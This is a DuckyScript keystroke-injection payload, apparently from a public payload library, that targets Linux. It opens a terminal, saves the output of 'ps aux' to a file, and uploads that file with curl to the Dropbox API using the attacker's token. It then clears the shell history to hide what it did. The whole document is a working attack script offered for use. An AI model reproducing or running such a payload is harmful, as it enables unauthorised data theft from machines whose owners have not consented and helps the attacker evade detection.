Path: blob/master/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
2971 views
1REM ##########################################2REM # |3REM # Title : Exfiltrate Process Info |4REM # Author : Aleff |5REM # Version : 1.0 |6REM # Category : Exfiltration |7REM # Target : Linux |8REM # |9REM ##########################################1011REM Requirements:12REM - Internet Connection13REM - Discord Webhook1415DELAY 100016CTRL-ALT t17DELAY 2000181920REM #### GET PROCESS SECTION ####212223STRING ps aux > process.txt24ENTER25DELAY 500262728REM #### EXFILTRATE SECTION ####293031REM Required: Set here your Dropbox access TOKEN32DEFINE TOKEN example33STRING ACCESS_TOKEN="34STRING TOKEN35STRING "36ENTER37DELAY 5003839STRING USER_NAME=$(whoami)40ENTER41DELAY 5004243STRING TXT_PATH="/home/$USER_NAME/process.txt"44ENTER45DELAY 5004647REM Set yout Dropbox folder name48DEFINE DROPBOX_FOLDER_NAME example49STRING DROPBOX_FOLDER="/50STRING DROPBOX_FOLDER_NAME51STRING "52ENTER53DELAY 5005455DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload56STRING curl -X POST57STRING DROPBOX_API_CONST58STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"59ENTER6061REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient62DELAY 2000636465REM #### REMOVE TRACES ####666768STRING history -c69ENTER70DELAY 50071STRING exit72ENTER737475